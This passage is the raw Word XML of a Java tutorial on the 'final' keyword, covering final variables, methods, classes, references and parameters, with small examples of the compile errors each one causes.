          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — once initialized, its value </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot be changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2135D532" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868B381" w14:textId="77777777" w:rsidR="00F43C80" w:rsidRPr="00CE4B95" w:rsidRDefault="00F43C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5608782"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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x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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A035162" w14:textId="5AE51219" w:rsidR="00F43C80" w:rsidRPr="00CE4B95" w:rsidRDefault="00F43C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5608782"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">// x = 20; // </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compilation error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3718A91A" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481C23FC" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Constants (static final)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9D56B5" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ensuring values remain unchanged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011447A2" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F43C80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="04FB2972">
          <v:rect id="_x0000_i1077" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="020CB84B" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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2. final Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06CFB1" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevents a method from being </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495A925A" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B378D25" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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are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D2EAFE4" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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sh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31E836F" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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arent show"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A52FB5" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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7B83346" w14:textId="792B8B67" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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4093A88C" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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hil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xtend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are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BB5D9D7" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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xml:space="preserve">// void show() { } // </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Error: Cannot override final method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DE6361" w14:textId="7D106625" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFDCE9D" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EC5F57" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Security or utility methods that shouldn't be altered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C123B4A" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F43C80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3271BADB">
          <v:rect id="_x0000_i1078" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02793F95" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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3. final Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088E55D" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevents a class from being </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subclassed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., inherited).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED3D70A" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C465E9E" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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481754"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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nim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2A87CB0" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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4817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spea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4C422A3" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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4817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Roar"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371919F" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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4817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6EC5966" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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481754"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642E99AF" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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481754"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC20D1A" w14:textId="0A060F57" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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481754"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">// class Dog extends Animal {} // </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Error: Cannot inherit from final class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184FF1DB" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFE182E" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Immutable or security-sensitive classes (like java.lang.String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F26A57" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F43C80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="501A1F20">
          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E645FA" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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4. final with Reference Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32174E67" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can’t reassign</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the reference, but the object it points to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can still be modified</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020DDD74" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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9559217"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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name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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F55CAB" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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9559217"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name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li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xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6011D2C6" w14:textId="15C990F6" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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9559217"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">// names = new ArrayList&lt;&gt;(); // </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Not allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686CFA0D" w14:textId="39C7EBAF" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33400336" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95" w:rsidRDefault="00F00606" w:rsidP="00F43C80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C1BE08" w14:textId="70CAE855" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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5. final with Method Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA415AB" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Makes the parameter </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read-only</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F19788" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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642254"/>
        <w:rPr>
